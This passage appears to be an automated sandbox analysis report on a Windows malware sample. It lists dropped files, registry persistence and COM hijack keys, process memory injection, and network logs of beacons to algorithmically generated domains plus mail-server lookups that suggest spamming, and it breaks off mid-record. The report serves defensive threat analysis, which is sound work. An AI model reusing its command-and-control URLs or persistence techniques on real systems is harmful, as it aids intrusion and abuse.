File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.19041.1_de-de_6988eb133eb82b0f\401-2.htm	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-m..osoftedge.resources_31bf3856ad364e35_10.0.19041.1_en-us_a323edc73bd86475\pdferrorrepurchasecontent.html	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-o..documents.resources_31bf3856ad364e35_10.0.19041.1_it-it_550e1235949cf95b\OOBE_HELP_Opt_in_Details.htm	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..rastructureconsumer_31bf3856ad364e35_10.0.19041.1_none_69cd9c22cfcf9358\Report.System.Diagnostics.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_10.0.19041.1_it-it_0ea2d3573f56d2e1\default.help.txt	smnss.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\speech\0409\tokens_enUS.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1266_none_777e4c5802d14c18\retailDemoMsa.html	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.19041.1_en-us_1279c10c2d9636d4\404.htm	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.19041.1_de-de_c2bbc1ff4b155b96\Report.System.Memory.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.19041.1_es-es_6b77f4dc3a1a5900\Report.System.CPU.xml	smnss.exe
File opened for modification	C:\Windows\SystemApps\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\AppxManifest.xml	smnss.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\es-ES\assets\ErrorPages\unknownprotocol.htm	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1266_none_777e4c5802d14c18\default.html	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-dot3svc.resources_31bf3856ad364e35_10.0.19041.1_uk-ua_e712e6b5052a090d\Rules.System.Wired.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_414a0942eadc3634\403-15.htm	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-s..iencehost.appxsetup_31bf3856ad364e35_10.0.19041.1023_none_411a61445fd08261\AppxBlockMap.xml	smnss.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\de-DE\assets\ErrorPages\http_404.htm	smnss.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2f6d0f943d6a0bc76f573a6686008cc0N.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ctfmen.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	smnss.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InprocServer32	2f6d0f943d6a0bc76f573a6686008cc0N.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node	2f6d0f943d6a0bc76f573a6686008cc0N.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID	2f6d0f943d6a0bc76f573a6686008cc0N.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}	2f6d0f943d6a0bc76f573a6686008cc0N.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InprocServer32\ = "C:\\Windows\\SysWow64\\shervans.dll"	2f6d0f943d6a0bc76f573a6686008cc0N.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InprocServer32\ = "C:\\Windows\\SysWow64\\shervans.dll"	smnss.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4092	smnss.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2508 wrote to memory of 3124	2508	2f6d0f943d6a0bc76f573a6686008cc0N.exe	90
PID 2508 wrote to memory of 3124	2508	2f6d0f943d6a0bc76f573a6686008cc0N.exe	90
PID 2508 wrote to memory of 3124	2508	2f6d0f943d6a0bc76f573a6686008cc0N.exe	90
PID 3124 wrote to memory of 4092	3124	ctfmen.exe	91
PID 3124 wrote to memory of 4092	3124	ctfmen.exe	91
PID 3124 wrote to memory of 4092	3124	ctfmen.exe	91

C:\Users\Admin\AppData\Local\Temp\2f6d0f943d6a0bc76f573a6686008cc0N.exe
"C:\Users\Admin\AppData\Local\Temp\2f6d0f943d6a0bc76f573a6686008cc0N.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Maps connected drives based on registry
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2508
- C:\Windows\SysWOW64\ctfmen.exe
  ctfmen.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3124
- - C:\Windows\SysWOW64\smnss.exe
    C:\Windows\system32\smnss.exe
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Enumerates connected drives
    - Maps connected drives based on registry
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    PID:4092

Network

DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.ax-0001.ax-msedge.net

g-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c7484baea27e4926af9fd67fc886fe3b&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c7484baea27e4926af9fd67fc886fe3b&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=0BA9FF493AB462310F79EBAF3B54631C; domain=.bing.com; expires=Fri, 19-Sep-2025 23:09:49 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 0DF8A7EC3E1240EFAD8B2266F5221442 Ref B: LON04EDGE1022 Ref C: 2024-08-25T23:09:49Z
date: Sun, 25 Aug 2024 23:09:48 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c7484baea27e4926af9fd67fc886fe3b&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c7484baea27e4926af9fd67fc886fe3b&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=0BA9FF493AB462310F79EBAF3B54631C

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=jgwIqQogasZyq9zuPsyRqT3KDDmXYklc0RgjOWaG_OE; domain=.bing.com; expires=Fri, 19-Sep-2025 23:09:49 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: DAAF2949DF8A42BB98B1372C02DDBAD1 Ref B: LON04EDGE1022 Ref C: 2024-08-25T23:09:49Z
date: Sun, 25 Aug 2024 23:09:48 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c7484baea27e4926af9fd67fc886fe3b&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c7484baea27e4926af9fd67fc886fe3b&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=0BA9FF493AB462310F79EBAF3B54631C; MSPTC=jgwIqQogasZyq9zuPsyRqT3KDDmXYklc0RgjOWaG_OE

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 874A40DA14FE4A6FBF39C5C6CF002667 Ref B: LON04EDGE1022 Ref C: 2024-08-25T23:09:49Z
date: Sun, 25 Aug 2024 23:09:49 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360492575_1SSJ82L6CB3K86OHJ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239360492575_1SSJ82L6CB3K86OHJ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 802236
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8E50037D52674647B02E685E4D84F1D5 Ref B: LON04EDGE1115 Ref C: 2024-08-25T23:09:49Z
date: Sun, 25 Aug 2024 23:09:48 GMT
DNS

14.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.160.190.20.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
DNS

qewhshmsen.info

smnss.exe

Remote address:

8.8.8.8:53

Request

qewhshmsen.info

IN A

Response

qewhshmsen.info

IN A

34.218.204.173
DNS

qewhshmsen.info

smnss.exe

Remote address:

8.8.8.8:53

Request

qewhshmsen.info

IN A
GET

http://qewhshmsen.info/imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk

smnss.exe

Remote address:

34.218.204.173:80

Request

GET /imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk HTTP/1.1
Host: qewhshmsen.info
User-Agent: explwer

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 25 Aug 2024 23:09:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=08edb29c733cc93083a9b1a421e24e77|194.110.13.70|1724627395|1724627395|0|1|0; path=/; domain=.qewhshmsen.info; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gzip.org

smnss.exe

Remote address:

8.8.8.8:53

Request

gzip.org

IN MX

Response

gzip.org

IN MX

�
DNS

gzip.org

smnss.exe

Remote address:

8.8.8.8:53

Request

gzip.org

IN MX
DNS

alumni.caltech.edu

smnss.exe

Remote address:

8.8.8.8:53

Request

alumni.caltech.edu

IN MX

Response

alumni.caltech.edu

IN MX

alumni-caltech-edumail protectionoutlookcom
DNS

alumni.caltech.edu

smnss.exe

Remote address:

8.8.8.8:53

Request

alumni.caltech.edu

IN MX
DNS

alumni.caltech.edu

smnss.exe

Remote address:

8.8.8.8:53

Request

alumni.caltech.edu

IN MX
DNS

cs.stanford.edu

smnss.exe

Remote address:

8.8.8.8:53

Request

cs.stanford.edu

IN MX

Response

cs.stanford.edu

IN MX

smtp1�

cs.stanford.edu

IN MX

smtp2�

cs.stanford.edu

IN MX

�
DNS

smtp1.cs.stanford.edu

smnss.exe

Remote address:

8.8.8.8:53

Request

smtp1.cs.stanford.edu

IN A

Response

smtp1.cs.stanford.edu

IN A

171.64.64.25
DNS

acm.org

smnss.exe

Remote address:

8.8.8.8:53

Request

acm.org

IN MX

Response

acm.org

IN MX

mail mailroutenet
DNS

mail.mailroute.net

smnss.exe

Remote address:

8.8.8.8:53

Request

mail.mailroute.net

IN A

Response

mail.mailroute.net

IN A

199.89.3.120

mail.mailroute.net

IN A

199.89.1.120
DNS

wpwhpqraws.in

smnss.exe

Remote address:

8.8.8.8:53

Request

wpwhpqraws.in

IN A

Response
DNS

rsppprawrn.org

smnss.exe

Remote address:

8.8.8.8:53

Request

rsppprawrn.org

IN A

Response

rsppprawrn.org

IN A

18.208.156.248
GET

http://rsppprawrn.org/imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk

smnss.exe

Remote address:

18.208.156.248:80

Request

GET /imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk HTTP/1.1
Host: rsppprawrn.org
User-Agent: explwer

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 25 Aug 2024 23:09:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5cf2e1f5e94a9614f5e18e3c5000d1ce|194.110.13.70|1724627397|1724627397|0|1|0; path=/; domain=.rsppprawrn.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

173.204.218.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

173.204.218.34.in-addr.arpa

IN PTR

Response

173.204.218.34.in-addr.arpa

IN PTR

ec2-34-218-204-173 us-west-2compute amazonawscom
DNS

133.211.185.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.211.185.52.in-addr.arpa

IN PTR

Response
DNS

gzip.org

smnss.exe

Remote address:

8.8.8.8:53

Request

gzip.org

IN A

Response

gzip.org

IN A

85.187.148.2
DNS

mrsqwnmhwa.in

smnss.exe

Remote address:

8.8.8.8:53

Request

mrsqwnmhwa.in

IN A

Response
DNS

apaqwweesn.com

smnss.exe

Remote address:

8.8.8.8:53

Request

apaqwweesn.com

IN A

Response
DNS

wnhhwpqman.in

smnss.exe

Remote address:

8.8.8.8:53

Request

wnhhwpqman.in

IN A

Response
DNS

amamqheaen.com

smnss.exe

Remote address:

8.8.8.8:53

Request

amamqheaen.com

IN A

Response
DNS

snwwwwnqra.biz

smnss.exe

Remote address:

8.8.8.8:53

Request

snwwwwnqra.biz

IN A

Response
DNS

248.156.208.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

248.156.208.18.in-addr.arpa

IN PTR

Response

248.156.208.18.in-addr.arpa

IN PTR

ec2-18-208-156-248 compute-1 amazonawscom
DNS

prsrsreswh.in

smnss.exe

Remote address:

8.8.8.8:53

Request

prsrsreswh.in

IN A

Response
DNS

emsnpqmnaa.ws

smnss.exe

Remote address:

8.8.8.8:53

Request

emsnpqmnaa.ws

IN A

Response

emsnpqmnaa.ws

IN A

64.70.19.203
GET

http://emsnpqmnaa.ws/imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk

smnss.exe

Remote address:

64.70.19.203:80

Request

GET /imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk HTTP/1.1
Host: emsnpqmnaa.ws
User-Agent: explwer
DNS

alumni-caltech-edu.mail.protection.outlook.com

smnss.exe

Remote address:

8.8.8.8:53

Request

alumni-caltech-edu.mail.protection.outlook.com

IN A

Response

alumni-caltech-edu.mail.protection.outlook.com

IN A

52.101.9.12

alumni-caltech-edu.mail.protection.outlook.com

IN A

52.101.194.19

alumni-caltech-edu.mail.protection.outlook.com

IN A

52.101.194.3

alumni-caltech-edu.mail.protection.outlook.com

IN A

52.101.9.2
DNS

gmail.com

smnss.exe

Remote address:

8.8.8.8:53

Request

gmail.com

IN MX

Response

gmail.com

IN MX

alt3 gmail-smtp-inlgoogle�

gmail.com

IN MX

alt2�.

gmail.com

IN MX

(alt4�.

gmail.com

IN MX

�.

gmail.com

IN MX

alt1�.
DNS

alt3.gmail-smtp-in.l.google.com

smnss.exe

Remote address:

8.8.8.8:53

Request

alt3.gmail-smtp-in.l.google.com

IN A

Response

alt3.gmail-smtp-in.l.google.com

IN A

142.251.9.26
DNS

alt3.gmail-smtp-in.l.google.com

smnss.exe

Remote address:

8.8.8.8:53

Request

alt3.gmail-smtp-in.l.google.com

IN A
DNS

alt3.gmail-smtp-in.l.google.com

smnss.exe

Remote address:

8.8.8.8:53

Request

alt3.gmail-smtp-in.l.google.com

IN A
DNS

m-ou.se

smnss.exe

Remote address:

8.8.8.8:53

Request

m-ou.se

IN MX

Response

m-ou.se

IN MX

alt1aspmxlgooglecom

m-ou.se

IN MX

aspmx5 googlemail�;

m-ou.se

IN MX

�,

m-ou.se

IN MX

aspmx2�U

m-ou.se

IN MX

aspmx4�U

m-ou.se

IN MX

aspmx3�U

m-ou.se

IN MX

alt2�,
DNS

alt1.aspmx.l.google.com

smnss.exe

Remote address:

8.8.8.8:53

Request

alt1.aspmx.l.google.com

IN A

Response

alt1.aspmx.l.google.com

IN A

142.250.27.27
DNS

aswahwaqwn.com

smnss.exe

Remote address:

8.8.8.8:53

Request

aswahwaqwn.com

IN A

Response
DNS

epnnmpmnea.ws

smnss.exe

Remote address:

8.8.8.8:53

Request

epnnmpmnea.ws

IN A

Response

epnnmpmnea.ws

IN A

64.70.19.203
GET

http://epnnmpmnea.ws/imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk

smnss.exe

Remote address:

64.70.19.203:80

Request

GET /imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk HTTP/1.1
Host: epnnmpmnea.ws
User-Agent: explwer
DNS

203.19.70.64.in-addr.arpa

Remote address:

8.8.8.8:53

Request

203.19.70.64.in-addr.arpa

IN PTR

Response

203.19.70.64.in-addr.arpa

IN PTR

mailrelay203websitews
DNS

nmmmswamss.us

smnss.exe

Remote address:

8.8.8.8:53

Request

nmmmswamss.us

IN A

Response
DNS

wpanwhahpn.in

smnss.exe

Remote address:

8.8.8.8:53

Request

wpanwhahpn.in

IN A

Response
DNS

qqrsmeawrh.info

smnss.exe

Remote address:

8.8.8.8:53

Request

qqrsmeawrh.info

IN A

Response
DNS

wsneamsrqs.in

smnss.exe

Remote address:

8.8.8.8:53

Request

wsneamsrqs.in

IN A

Response
DNS

wsneamsrqs.in

smnss.exe

Remote address:

8.8.8.8:53

Request

wsneamsrqs.in

IN A
DNS

rrnsweenen.org

smnss.exe

Remote address:

8.8.8.8:53

Request

rrnsweenen.org

IN A

Response

rrnsweenen.org

IN A

162.249.65.106
DNS

2.1.0

smnss.exe

Remote address:

8.8.8.8:53

Request

2.1.0

IN MX

Response
DNS

2.1.0

smnss.exe

Remote address:

8.8.8.8:53

Request

2.1.0

IN MX
DNS

4.0.1

smnss.exe

Remote address:

8.8.8.8:53

Request

4.0.1

IN MX

Response
DNS

nocorp.me

smnss.exe

Remote address:

8.8.8.8:53

Request

nocorp.me

IN MX

Response

nocorp.me

IN MX

in2-smtpmessagingenginecom

nocorp.me

IN MX

in1-smtp�2
DNS

in2-smtp.messagingengine.com

smnss.exe

Remote address:

8.8.8.8:53

Request

in2-smtp.messagingengine.com

IN A

Response

in2-smtp.messagingengine.com

IN A

202.12.124.217

in2-smtp.messagingengine.com

IN A

202.12.124.216
DNS

wpsranresn.in

smnss.exe

Remote address:

8.8.8.8:53

Request

wpsranresn.in

IN A

Response
DNS

qqwaqwqwns.info

smnss.exe

Remote address:

8.8.8.8:53

Request

qqwaqwqwns.info

IN A

Response
DNS

wshmnneqsr.in

smnss.exe

Remote address:

8.8.8.8:53

Request

wshmnneqsr.in

IN A

Response
DNS

rnrmsaeesr.org

smnss.exe

Remote address:

8.8.8.8:53

Request

rnrmsaeesr.org

IN A

Response

rnrmsaeesr.org

IN A

162.249.65.106
DNS

outlook.com

smnss.exe

Remote address:

8.8.8.8:53

Request

outlook.com

IN MX

Response

outlook.com

IN MX

outlook-comolc protection�
DNS

outlook-com.olc.protection.outlook.com

smnss.exe

Remote address:

8.8.8.8:53

Request

outlook-com.olc.protection.outlook.com

IN A

Response

outlook-com.olc.protection.outlook.com

IN A

52.101.68.38

outlook-com.olc.protection.outlook.com

IN A

52.101.73.23

outlook-com.olc.protection.outlook.com

IN A

52.101.11.20

outlook-com.olc.protection.outlook.com

IN A

52.101.68.11
DNS

eweqmrhnra.ws

smnss.exe

Remote address:

8.8.8.8:53

Request

eweqmrhnra.ws

IN A

Response

eweqmrhnra.ws

IN A

64.70.19.203
GET

http://eweqmrhnra.ws/imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk

smnss.exe

Remote address:

64.70.19.203:80

Request

GET /imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk HTTP/1.1
Host: eweqmrhnra.ws
User-Agent: explwer
DNS

smtp2.cs.stanford.edu

smnss.exe

Remote address:

8.8.8.8:53

Request

smtp2.cs.stanford.edu

IN A

Response

smtp2.cs.stanford.edu

IN A

171.64.64.26
DNS

qaeesahees.info

smnss.exe

Remote address:

8.8.8.8:53

Request

qaeesahees.info

IN A

Response
DNS

qaeesahees.info

smnss.exe

Remote address:

8.8.8.8:53

Request

qaeesahees.info

IN A
DNS

86.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.23.85.13.in-addr.arpa

IN PTR

Response
DNS

hwpprwwawa.net

smnss.exe

Remote address:

8.8.8.8:53

Request

hwpprwwawa.net

IN A

Response
DNS

pawrsswnsa.in

smnss.exe

Remote address:

8.8.8.8:53

Request

pawrsswnsa.in

IN A

Response
DNS

pawrsswnsa.in

smnss.exe

Remote address:

8.8.8.8:53

Request

pawrsswnsa.in

IN A
DNS

pawrsswnsa.in

smnss.exe

Remote address:

8.8.8.8:53

Request

pawrsswnsa.in

IN A
DNS

pawrsswnsa.in

smnss.exe

Remote address:

8.8.8.8:53

Request

pawrsswnsa.in

IN A
DNS

aspmx5.googlemail.com

smnss.exe

Remote address:

8.8.8.8:53

Request

aspmx5.googlemail.com

IN A

Response

aspmx5.googlemail.com

IN A

142.250.150.27
DNS

aspmx5.googlemail.com

smnss.exe

Remote address:

8.8.8.8:53

Request

aspmx5.googlemail.com

IN A
DNS

aspmx5.googlemail.com

smnss.exe

Remote address:

8.8.8.8:53

Request

aspmx5.googlemail.com

IN A
DNS

alumni-caltech-edu.mail.protection.outlook.com

smnss.exe

Remote address:

8.8.8.8:53

Request

alumni-caltech-edu.mail.protection.outlook.com

IN A

Response

alumni-caltech-edu.mail.protection.outlook.com

IN A

52.101.41.21

alumni-caltech-edu.mail.protection.outlook.com

IN A

52.101.9.26

alumni-caltech-edu.mail.protection.outlook.com

IN A

52.101.8.44

alumni-caltech-edu.mail.protection.outlook.com

IN A

52.101.194.13
DNS

coin.mpg

smnss.exe

Remote address:

8.8.8.8:53

Request

coin.mpg

IN MX

Response
DNS

alt2.gmail-smtp-in.l.google.com

smnss.exe

Remote address:

8.8.8.8:53

Request

alt2.gmail-smtp-in.l.google.com

IN A

Response

alt2.gmail-smtp-in.l.google.com

IN A

142.250.153.27
DNS

ewaehhmrqh.ws

smnss.exe

Remote address:

8.8.8.8:53

Request

ewaehhmrqh.ws

IN A

Response

ewaehhmrqh.ws

IN A

64.70.19.203
GET

http://ewaehhmrqh.ws/imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk

smnss.exe

Remote address:

64.70.19.203:80

Request

GET /imgs/krewa/nqxa.php?id=4744qyhn&s5=3159&lip=10.127.1.206&win=Unk HTTP/1.1
Host: ewaehhmrqh.ws
User-Agent: explwer
DNS

apple.com

smnss.exe

Remote address:

8.8.8.8:53

Request

apple.com

IN MX

Response

apple.com

IN MX

mx-ing�

apple.com

IN MX

mx-in-ma�

apple.com

IN MX

mx-in-rno�

apple.com

IN MX

mx-in-sg�

apple.com

IN MX

mx-in-rn�

apple.com

IN MX

mx-in-vib�

apple.com

IN MX

mx-in-mdn�

apple.com

IN MX

mx-in-hfd�
DNS

mx-in.g.apple.com

smnss.exe

Remote address:

8.8.8.8:53

Request

mx-in.g.apple.com

IN A

Response

mx-in.g.apple.com

IN A

17.57.165.2
DNS

pobox.com

smnss.exe

Remote address:

8.8.8.8:53

Request

pobox.com

IN MX

Response

pobox.com

IN MX

pb-mx10�

pobox.com

IN MX

pb-mx11�

pobox.com

IN MX

pb-mx9�

pobox.com

IN MX

pb-mx21�

pobox.com

IN MX

pb-mx23�

pobox.com

IN MX

pb-mx20�

pobox.com

IN MX

pb-mx14�

pobox.com

IN MX

pb-mx22�
DNS

pb-mx10.pobox.com

smnss.exe

Remote address:

8.8.8.8:53

Request

pb-mx10.pobox.com

IN A

Response

pb-mx10.pobox.com

IN A

64.147.108.51
DNS

ahrwrshwph.com

smnss.exe

Remote address:

8.8.8.8:53

Request

ahrwrshwph.com

IN A

Response
DNS

sqaqqaeqmh.biz

smnss.exe

Remote address:

8.8.8.8:53

Request

sqaqqaeqmh.biz

IN A

Response
DNS

nhqpwhmama.us

smnss.exe

Remote address:

8.8.8.8:53

Request

nhqpwhmama.us

IN A

Response
DNS

sesawnwqea.biz

smnss.exe

Remote address:

8.8.8.8:53

Request

